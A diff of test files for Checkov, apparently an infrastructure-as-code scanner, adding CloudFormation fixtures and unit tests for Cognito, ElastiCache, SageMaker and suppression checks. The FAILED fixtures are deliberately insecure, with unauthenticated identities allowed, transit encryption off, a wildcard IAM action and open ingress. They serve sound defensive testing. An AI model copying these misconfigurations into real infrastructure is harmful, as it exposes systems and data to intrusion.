a/tests/circleci_pipelines/image_referencer/test_runner.py +++ /dev/null @@ -1,68 +0,0 @@ -from pathlib import Path - -from checkov.circleci_pipelines.runner import Runner -from checkov.common.bridgecrew.bc_source import get_source_type -from checkov.common.bridgecrew.check_type import CheckType - -from checkov.runner_filter import RunnerFilter -from pytest_mock import MockerFixture - -from tests.common.image_referencer.test_utils import mock_get_empty_license_statuses_async, \ - mock_get_image_cached_result_async - -RESOURCES_PATH = Path(__file__).parent.parent / "resources" - - -def test_circleCI_workflow(mocker: MockerFixture, file_path, image_cached_results_for_report): - from checkov.common.bridgecrew.platform_integration import bc_integration - test_file = RESOURCES_PATH / file_path - - runner_filter = RunnerFilter(run_image_referencer=True) - bc_integration.bc_source = get_source_type("disabled") - - mocker.patch( - "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", - side_effect=mock_get_image_cached_result_async, - ) - mocker.patch( - "checkov.common.images.image_referencer.get_license_statuses_async", - side_effect=mock_get_empty_license_statuses_async, - ) - - reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(reports) == 2 - - circleci_report = next(report for report in reports if report.check_type == CheckType.CIRCLECI_PIPELINES) - sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) - - assert len(circleci_report.resources) == 0 - assert len(circleci_report.passed_checks) == 32 - assert len(circleci_report.failed_checks) == 13 - assert len(circleci_report.skipped_checks) == 0 - assert len(circleci_report.parsing_errors) == 0 - - assert len(sca_image_report.extra_resources) == 10 - assert len(sca_image_report.image_cached_results) == 10 - - got_images = ({ - 'image_name': image['dockerImageName'], - 'related_resource_id': image['relatedResourceId'], - 'packages': image['packages'] - } for image in sca_image_report.image_cached_results) - for image in got_images: - assert image in image_cached_results_for_report - assert len(sca_image_report.extra_resources) == 10 - assert len(sca_image_report.image_cached_results) == 10 - - -def test_runner_image_check(file_path): - test_file = RESOURCES_PATH / file_path - runner_filter = RunnerFilter(framework=['circleci_pipelines'], checks=['CKV_CIRCLECIPIPELINES_8']) - - report = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(report.failed_checks) == 0 - assert report.parsing_errors == [] - assert len(report.passed_checks) == 12 - assert report.skipped_checks ==[] diff --git a/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/FAILED.yml b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/FAILED.yml new file mode 100644 index 00000000000..8a5d5e8d9a8 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/FAILED.yml @@ -0,0 +1,8 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: Identity pool +Resources: + Fail: + Type: AWS::Cognito::IdentityPool + Properties: + AllowClassicFlow: True + AllowUnauthenticatedIdentities: True diff --git a/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/PASSED.yaml new file mode 100644 index 00000000000..b1fd73c9445 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/PASSED.yaml @@ -0,0 +1,8 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: Identity pool +Resources: + Pass: + Type: AWS::Cognito::IdentityPool + Properties: + AllowClassicFlow: True + AllowUnauthenticatedIdentities: False diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml index 848a622d6db..d946d9b07f9 100644 --- a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml +++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml @@ -110,7 +110,7 @@ Resources: SubnetIds: - !Ref SubnetA - !Ref SubnetB - ReplicationGroup: + ReplicationGroupFail: Type: 'AWS::ElastiCache::ReplicationGroup' Properties: AutomaticFailoverEnabled: !Ref MultiAZSupport @@ -131,16 +131,3 @@ Resources: SnapshotWindow: !Ref SnapshotWindow #TransitEncryptionEnabled: False TransitEncryptionEnabled: True -Outputs: - RGEndpoint: - Description: The primary endpoint location - Value: !Join - - '' - - - 'redis://' - - !GetAtt - - ReplicationGroup - - PrimaryEndPoint.Address - - ':' - - !GetAtt - - ReplicationGroup - - PrimaryEndPoint.Port diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED2.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED2.yaml new file mode 100644 index 00000000000..be814c09922 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED2.yaml @@ -0,0 +1,135 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: >- + An example template that stands up an ElastiCache Replication Group Multi-AZ in a particular VPC specifying then a Subnet Group and a Security Group, VpcId is not directly referenced by the Replication Group resource, and is instead inferred by the Security Group and Subnet Group. +Parameters: + CacheNodeType: + Description: The instance type the nodes will launch under. + Type: String + Default: cache.m3.medium + AllowedValues: + - cache.t2.micro + - cache.t2.small + - cache.t2.medium + - cache.m3.medium + - cache.m3.large + - cache.m3.xlarge + - cache.m3.2xlarge + - cache.r3.large + - cache.r3.xlarge + - cache.r3.2xlarge + - cache.r3.4xlarge + - cache.r3.8xlarge + MultiAZSupport: + Description: >- + Indicates whether Multi-AZ is enabled. When Multi-AZ is enabled, a + read-only replica is automatically promoted to a read-write primary + cluster if the existing primary cluster fails. If you specify true, you must specify a value greater than 1 for the NumCacheClusters property. + Type: String + Default: 'true' + AllowedValues: + - 'true' + - 'false' + NumCacheClusters: + Description: >- + The number of cache clusters for this replication group. If MultiAZ + support is enabled, you must specify a value greater than 1. + Default: '2' + Type: Number + MinValue: '1' + MaxValue: '6' + RedisPort: + Description: >- + The port number on which each member of the replication group accepts + connections. + Type: Number + Default: '6379' + MinValue: '1' + MaxValue: '65535' + ReplicationGroupDescription: + Description: The description of the replication group. + Type: String + Default: Example replication group + VpcId: + Description: The VPC to create this ReplicationGroup under + Type: 'AWS::EC2::VPC::Id' + CidrIp: + Description: The CIDR you want to access to the Replication Group + Type: String + Default: 0.0.0.0/0 + AllowedPattern: '(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})/(\d{1,2})' + MinLength: '9' + MaxLength: '18' + ConstraintDescription: must be a valid IP CIDR range of the form x.x.x.x/x + SnapshotRetentionLimit: + Description: >- + The number of days that ElastiCache retains automatic snapshots before + deleting them. + Type: Number + Default: '7' + SnapshotWindow: + Description: >- + The time range (in UTC) when ElastiCache takes a daily snapshot of your node group. + Type: String + Default: '05:00-09:00' + AllowedPattern: '\d{2}:\d{2}-\d{2}:\d{2}' + ConstraintDescription: 'must be a valid timestamp range, for example 05:00-09:00' + PreferredMaintenanceWindow: + Description: >- + The weekly time range during which system maintenance can occur. Use the following format to specify a time range: ddd:hh24:mi-ddd:hh24:mi (24H Clock UTC). + Type: String + Default: 'sun:22:00-sun:23:30' + AllowedPattern: >- + (mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2}-(mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2} + ConstraintDescription: >- + must be a valid timestamp range with day of week, for example + sun:22:00-sun:23:30 + SubnetA: + Description: >- + One of the subnets you would like the ReplicationGroup to be created in. In this example we only accept 2 subnets + Type: 'AWS::EC2::Subnet::Id' + SubnetB: + Description: >- + One of the subnets you would like the ReplicationGroup to be created in. In this example we only accept 2 subnets + Type: 'AWS::EC2::Subnet::Id' +Resources: + SecurityGroup: + Type: 'AWS::EC2::SecurityGroup' + Properties: + GroupDescription: Security Group for Example Replication Group + SecurityGroupIngress: + - Description: Redis Traffic + CidrIp: !Ref CidrIp + FromPort: !Ref RedisPort + ToPort: !Ref RedisPort + IpProtocol: tcp + VpcId: !Ref VpcId + SubnetGroup: + Type: 'AWS::ElastiCache::SubnetGroup' + Properties: + Description: Subnet Group for Example Replication Group + SubnetIds: + - !Ref SubnetA + - !Ref SubnetB + ReplicationGroupFail2: + Type: 'AWS::ElastiCache::ReplicationGroup' + Properties: + AutomaticFailoverEnabled: !Ref MultiAZSupport + AtRestEncryptionEnabled: True + #AtRestEncryptionEnabled: False # Optional parameter + CacheNodeType: !Ref CacheNodeType + CacheSubnetGroupName: !Ref SubnetGroup + Engine: redis + NumCacheClusters: !Ref NumCacheClusters + Port: !Ref RedisPort + PreferredMaintenanceWindow: !Ref PreferredMaintenanceWindow + ReplicationGroupDescription: !Ref ReplicationGroupDescription + SecurityGroupIds: + - !GetAtt + - SecurityGroup + - GroupId + SnapshotRetentionLimit: !Ref SnapshotRetentionLimit + SnapshotWindow: !Ref SnapshotWindow + #TransitEncryptionEnabled: False + TransitEncryptionEnabled: False + UserGroupIds: + - Example diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml index 31137999bd5..55b459be5ab 100644 --- a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml +++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml @@ -110,7 +110,7 @@ Resources: SubnetIds: - !Ref SubnetA - !Ref SubnetB - ReplicationGroup: + ReplicationGroupPass: Type: 'AWS::ElastiCache::ReplicationGroup' Properties: AuthToken: 'MySecret!AuthToken$' @@ -132,16 +132,4 @@ Resources: SnapshotWindow: !Ref SnapshotWindow #TransitEncryptionEnabled: False TransitEncryptionEnabled: True -Outputs: - RGEndpoint: - Description: The primary endpoint location - Value: !Join - - '' - - - 'redis://' - - !GetAtt - - ReplicationGroup - - PrimaryEndPoint.Address - - ':' - - !GetAtt - - ReplicationGroup - - PrimaryEndPoint.Port + diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml new file mode 100644 index 00000000000..0c71e1fecbc --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml @@ -0,0 +1,136 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: >- + An example template that stands up an ElastiCache Replication Group Multi-AZ in a particular VPC specifying then a Subnet Group and a Security Group, VpcId is not directly referenced by the Replication Group resource, and is instead inferred by the Security Group and Subnet Group. +Parameters: + CacheNodeType: + Description: The instance type the nodes will launch under. + Type: String + Default: cache.m3.medium + AllowedValues: + - cache.t2.micro + - cache.t2.small + - cache.t2.medium + - cache.m3.medium + - cache.m3.large + - cache.m3.xlarge + - cache.m3.2xlarge + - cache.r3.large + - cache.r3.xlarge + - cache.r3.2xlarge + - cache.r3.4xlarge + - cache.r3.8xlarge + MultiAZSupport: + Description: >- + Indicates whether Multi-AZ is enabled. When Multi-AZ is enabled, a + read-only replica is automatically promoted to a read-write primary + cluster if the existing primary cluster fails. If you specify true, you must specify a value greater than 1 for the NumCacheClusters property. + Type: String + Default: 'true' + AllowedValues: + - 'true' + - 'false' + NumCacheClusters: + Description: >- + The number of cache clusters for this replication group. If MultiAZ + support is enabled, you must specify a value greater than 1. + Default: '2' + Type: Number + MinValue: '1' + MaxValue: '6' + RedisPort: + Description: >- + The port number on which each member of the replication group accepts + connections. + Type: Number + Default: '6379' + MinValue: '1' + MaxValue: '65535' + ReplicationGroupDescription: + Description: The description of the replication group. + Type: String + Default: Example replication group + VpcId: + Description: The VPC to create this ReplicationGroup under + Type: 'AWS::EC2::VPC::Id' + CidrIp: + Description: The CIDR you want to access to the Replication Group + Type: String + Default: 0.0.0.0/0 + AllowedPattern: '(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})/(\d{1,2})' + MinLength: '9' + MaxLength: '18' + ConstraintDescription: must be a valid IP CIDR range of the form x.x.x.x/x + SnapshotRetentionLimit: + Description: >- + The number of days that ElastiCache retains automatic snapshots before + deleting them. + Type: Number + Default: '7' + SnapshotWindow: + Description: >- + The time range (in UTC) when ElastiCache takes a daily snapshot of your node group. + Type: String + Default: '05:00-09:00' + AllowedPattern: '\d{2}:\d{2}-\d{2}:\d{2}' + ConstraintDescription: 'must be a valid timestamp range, for example 05:00-09:00' + PreferredMaintenanceWindow: + Description: >- + The weekly time range during which system maintenance can occur. Use the following format to specify a time range: ddd:hh24:mi-ddd:hh24:mi (24H Clock UTC). + Type: String + Default: 'sun:22:00-sun:23:30' + AllowedPattern: >- + (mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2}-(mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2} + ConstraintDescription: >- + must be a valid timestamp range with day of week, for example + sun:22:00-sun:23:30 + SubnetA: + Description: >- + One of the subnets you would like the ReplicationGroup to be created in. In this example we only accept 2 subnets + Type: 'AWS::EC2::Subnet::Id' + SubnetB: + Description: >- + One of the subnets you would like the ReplicationGroup to be created in. In this example we only accept 2 subnets + Type: 'AWS::EC2::Subnet::Id' +Resources: + SecurityGroup: + Type: 'AWS::EC2::SecurityGroup' + Properties: + GroupDescription: Security Group for Example Replication Group + SecurityGroupIngress: + - Description: Redis Traffic + CidrIp: !Ref CidrIp + FromPort: !Ref RedisPort + ToPort: !Ref RedisPort + IpProtocol: tcp + VpcId: !Ref VpcId + SubnetGroup: + Type: 'AWS::ElastiCache::SubnetGroup' + Properties: + Description: Subnet Group for Example Replication Group + SubnetIds: + - !Ref SubnetA + - !Ref SubnetB + ReplicationGroupPass2: + Type: 'AWS::ElastiCache::ReplicationGroup' + Properties: + AutomaticFailoverEnabled: !Ref MultiAZSupport + AtRestEncryptionEnabled: True + #AtRestEncryptionEnabled: False # Optional parameter + CacheNodeType: !Ref CacheNodeType + CacheSubnetGroupName: !Ref SubnetGroup + Engine: redis + NumCacheClusters: !Ref NumCacheClusters + Port: !Ref RedisPort + PreferredMaintenanceWindow: !Ref PreferredMaintenanceWindow + ReplicationGroupDescription: !Ref ReplicationGroupDescription + SecurityGroupIds: + - !GetAtt + - SecurityGroup + - GroupId + SnapshotRetentionLimit: !Ref SnapshotRetentionLimit + SnapshotWindow: !Ref SnapshotWindow + #TransitEncryptionEnabled: False + TransitEncryptionEnabled: True + UserGroupIds: + - Example + diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookEncryptedWithCMK/template.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookEncryptedWithCMK/template.yaml new file mode 100644 index 00000000000..2f2fb8d24cc --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookEncryptedWithCMK/template.yaml @@ -0,0 +1,38 @@ +Resources: + BasicNotebookInstancePASS: + Type: "AWS::SageMaker::NotebookInstance" + Properties: + InstanceType: "ml.t2.large" + RoleArn: "!GetAtt ExecutionRole.Arn" + KmsKeyId: "bla bla" + BasicNotebookInstanceFAIL: + Type: "AWS::SageMaker::NotebookInstance" + Properties: + InstanceType: "ml.t2.large" + RoleArn: "!GetAtt ExecutionRole.Arn" + + BasicDomainPASS: + Metadata: + cfn-lint: + config: + ignore_checks: + - E3002 + - E3030 + - E3003 + Type: "AWS::SageMaker::Domain" + Properties: + InstanceType: "ml.t2.large" + RoleArn: "!GetAtt ExecutionRole.Arn" + KmsKeyId: "bla bla" + BasicDomainFAIL: + Metadata: + cfn-lint: + config: + ignore_checks: + - E3002 + - E3030 + - E3003 + Type: "AWS::SageMaker::Domain" + Properties: + InstanceType: "ml.t2.large" + RoleArn: "!GetAtt ExecutionRole.Arn" diff --git a/tests/cloudformation/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py b/tests/cloudformation/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py new file mode 100644 index 00000000000..cdba703f9f7 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py @@ -0,0 +1,46 @@ +import os +import unittest + +from checkov.cloudformation.checks.resource.aws.CognitoUnauthenticatedIdentities import check +from checkov.cloudformation.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestCognitoUnauthenticatedIdentities(unittest.TestCase): + + def test_summary(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = current_dir + "/example_CognitoUnauthenticatedIdentities" + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + for record in report.failed_checks: + self.assertEqual(record.check_id, check.id) + + for record in report.passed_checks: + self.assertEqual(record.check_id, check.id) + + passing_resources = { + "AWS::Cognito::IdentityPool.Pass", + } + + failing_resources = { + "AWS::Cognito::IdentityPool.Fail", + + } + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary['passed'], len(passing_resources)) + self.assertEqual(summary['failed'], len(failing_resources)) + self.assertEqual(summary['skipped'], 0) + self.assertEqual(summary['parsing_errors'], 0) + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == '__main__': + unittest.main() diff --git a/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py index caaa9dab012..49a069de7a8 100644 --- a/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py +++ b/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py @@ -16,10 +16,25 @@ def test_summary(self): report = runner.run(root_folder=test_files_dir,runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() - self.assertEqual(summary['passed'], 1) - self.assertEqual(summary['failed'], 1) - self.assertEqual(summary['skipped'], 0) - self.assertEqual(summary['parsing_errors'], 0) + passing_resources = { + "AWS::ElastiCache::ReplicationGroup.ReplicationGroupPass", + "AWS::ElastiCache::ReplicationGroup.ReplicationGroupPass2", + } + failing_resources = { + "AWS::ElastiCache::ReplicationGroup.ReplicationGroupFail", + "AWS::ElastiCache::ReplicationGroup.ReplicationGroupFail2", + } + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) if __name__ == '__main__': diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookEncryptedWithCMK.py b/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookEncryptedWithCMK.py new file mode 100644 index 00000000000..1c46768d336 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookEncryptedWithCMK.py @@ -0,0 +1,41 @@ +import os +import unittest + +from checkov.cloudformation.checks.resource.aws.SagemakerNotebookEncryptedWithCMK import check +from checkov.cloudformation.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestSagemakerNotebookEncryptedWithCMK(unittest.TestCase): + + def test_summary(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = current_dir + "/example_SagemakerNotebookEncryptedWithCMK" + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + "AWS::SageMaker::NotebookInstance.BasicNotebookInstancePASS", + "AWS::SageMaker::Domain.BasicDomainPASS" + } + failing_resources = { + "AWS::SageMaker::NotebookInstance.BasicNotebookInstanceFAIL", + "AWS::SageMaker::Domain.BasicDomainFAIL" + } + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml new file mode 100644 index 00000000000..edcaf4cb2bc --- /dev/null +++ b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml @@ -0,0 +1,8 @@ +pass: + - "AWS::SageMaker::NotebookInstance.aws_sagemaker_notebook_instance_pass" + - "AWS::SageMaker::NotebookInstance.aws_sagemaker_notebook_instance_pass2" +fail: + - "AWS::SageMaker::NotebookInstance.aws_sagemaker_notebook_instance_fail" +evaluated_keys: + - 'AssumeRolePolicyDocument/Statement[?(@/Effect == Allow)]/Action[*]' + - 'resource_type' diff --git a/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/template.yaml b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/template.yaml new file mode 100644 index 00000000000..62879334133 --- /dev/null +++ b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/template.yaml @@ -0,0 +1,64 @@ +Resources: + aws_sagemaker_notebook_instance_pass: + Type: AWS::SageMaker::NotebookInstance + Properties: + NotebookInstanceName: my-notebook-instance + InstanceType: "" + RoleArn: !GetAtt aws_iam_role.Arn + + aws_iam_role: + Type: AWS::IAM::Role + Properties: + AssumeRolePolicyDocument: + Version: '2012-10-17' + Statement: + - Effect: Allow + Principal: + Service: sagemaker.amazonaws.com + Action: sts:AssumeRole + + aws_sagemaker_notebook_instance_pass2: + Type: AWS::SageMaker::NotebookInstance + Properties: + NotebookInstanceName: my-notebook-instance + ServiceToken: "" + RoleArn: !GetAtt aws_iam_role2.Arn + + aws_iam_role2: + Type: AWS::IAM::Role + Properties: + AssumeRolePolicyDocument: + Version: '2012-10-17' + Statement: + - Effect: Allow + Principal: + Service: sagemaker.amazonaws.com + Action: sts:AssumeRole + Policies: + - PolicyName: my-policy + PolicyDocument: + Version: '2012-10-17' + Statement: + - Effect: Allow + Action: sagemaker:* + Resource: !Sub 'arn:aws:sagemaker:${AWS::Region}:${AWS::AccountId}:notebook-instance/*' + Condition: + IpAddress: + 'aws:SourceIp': '192.0.2.0/24' + + aws_sagemaker_notebook_instance_fail: + Type: AWS::SageMaker::NotebookInstance + Properties: + NotebookInstanceName: my-notebook-instance + RoleArn: !GetAtt aws_iam_role3.Arn + + aws_iam_role3: + Type: AWS::IAM::Role + Properties: + AssumeRolePolicyDocument: + Version: '2012-10-17' + Statement: + - Effect: Allow + Principal: + Service: sagemaker.amazonaws.com + Action: '*' diff --git a/tests/cloudformation/graph/checks/test_yaml_policies.py b/tests/cloudformation/graph/checks/test_yaml_policies.py index bd1559557ae..38ba819fcc7 100644 --- a/tests/cloudformation/graph/checks/test_yaml_policies.py +++ b/tests/cloudformation/graph/checks/test_yaml_policies.py @@ -39,6 +39,9 @@ def test_MSKClusterLogging(self): def test_LambdaFunction(self): self.go("LambdaFunction") + def test_SageMakerIAMPolicyOverlyPermissiveToAllTraffic(self): + self.go("SageMakerIAMPolicyOverlyPermissiveToAllTraffic") + def test_ALBRedirectHTTPtoHTTPS(self): self.go("ALBRedirectHTTPtoHTTPS") diff --git a/tests/common/integration_features/test_policy_metadata_integration.py b/tests/common/integration_features/test_policy_metadata_integration.py index d85f0ca2d8f..d584a941303 100644 --- a/tests/common/integration_features/test_policy_metadata_integration.py +++ b/tests/common/integration_features/test_policy_metadata_integration.py @@ -18,9 +18,10 @@ def test_filtered_policy_ids(self): metadata_integration.bc_integration = instance metadata_integration.pre_scan() metadata_integration.pc_to_ckv_id_mapping - self.assertDictEqual(metadata_integration.pc_to_ckv_id_mapping, {'6960be11-e3a6-46cc-bf66-933c57c2af5d': 'CKV_AWS_212', '3dc2478c-bf25-4383-aaa1-30feb5cda586': '806079891421835264_AZR_1685557908904', 'c11ce08c-b93e-4e11-8d1c-e5a1339139d1': 'CKV_AWS_40', '0e4c576e-c934-4af3-8592-a53920e71ffb': 'CKV_AWS_53'}) + self.assertDictEqual(metadata_integration.pc_to_ckv_id_mapping, {'6960be11-e3a6-46cc-bf66-933c57c2af5d': 'CKV_AWS_212', '3dc2478c-bf25-4383-aaa1-30feb5cda586': '806079891421835264_AZR_1685557908904', 'c11ce08c-b93e-4e11-8d1c-e5a1339139d1': 'CKV_AWS_40', '0e4c576e-c934-4af3-8592-a53920e71ffb': 'CKV_AWS_53', '1234': 'CKV3_SAST_123'}) self.assertListEqual(metadata_integration.filtered_policy_ids, ['CKV_AWS_212', '806079891421835264_AZR_1685557908904', 'CKV_AWS_40', 'CKV_AWS_53', 'CKV_AZURE_122']) self.assertListEqual(metadata_integration.filtered_exception_policy_ids, ['CKV_AWS_212']) + self.assertSetEqual(set(metadata_integration.sast_check_metadata.keys()), {'CKV3_SAST_123'}) def mock_customer_run_config(): @@ -89,6 +90,22 @@ def mock_customer_run_config(): "3dc2478c-bf25-4383-aaa1-30feb5cda586" ], "benchmarks": {} + }, + "CKV3_SAST_123": { + "id": "BC_SAST_123", + "title": "sast", + "guideline": "https://docs.bridgecrew.io/docs/abc", + "severity": "LOW", + "pcSeverity": "LOW", + "category": "Networking", + "checkovId": "CKV3_SAST_123", + "constructiveTitle": "sast", + "descriptiveTitle": "sast", + "pcPolicyId": "1234", + "additionalPcPolicyIds": [ + "1234" + ], + "benchmarks": {} } }, "customPolicies": [ diff --git a/tests/common/integration_features/test_suppressions_integration.py b/tests/common/integration_features/test_suppressions_integration.py index c5c00cb994d..2bae612f052 100644 --- a/tests/common/integration_features/test_suppressions_integration.py +++ b/tests/common/integration_features/test_suppressions_integration.py @@ -226,6 +226,37 @@ def test_policy_suppression(self): self.assertTrue(suppressions_integration._check_suppression(record1, suppression)) self.assertFalse(suppressions_integration._check_suppression(record2, suppression)) + def test_policy_v2_suppression(self): + instance = BcPlatformIntegration() + + suppressions_integration = SuppressionsIntegration(instance) + suppressions_integration._init_repo_regex() + + suppression = { + "ruleType": "policy", + "checkovPolicyIds": ["CKV_AWS_79", "CKV_AWS_80"], + } + + record1 = Record(check_id='CKV_AWS_79', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record2 = Record(check_id='CKV_AWS_80', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record3 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + + self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression)) + self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression)) + self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression)) + def test_suppress_by_policy_BC_VUL_2(self): instance = BcPlatformIntegration() @@ -818,6 +849,45 @@ def test_account_suppression(self): self.assertTrue(suppressions_integration._check_suppression(record1, suppression)) self.assertFalse(suppressions_integration._check_suppression(record2, suppression)) + def test_repo_v2_suppression(self): + instance = BcPlatformIntegration() + instance.repo_id = 'org/repo' + suppressions_integration = SuppressionsIntegration(instance) + suppressions_integration._init_repo_regex() + suppression = { + "ruleType": "repository", + "repositories": [ + {"repositoryName": "org/repo"}, + {"repositoryName": "not/valid"} + ], + "checkovPolicyIds": ["CKV_AWS_18", "CKV_AWS_19"], + } + + # this is actually almost the same as a policy check, except we care about the repo name in the integration + # record details do not matter, except policy ID + record1 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record2 = Record(check_id='CKV_AWS_19', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record3 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + + 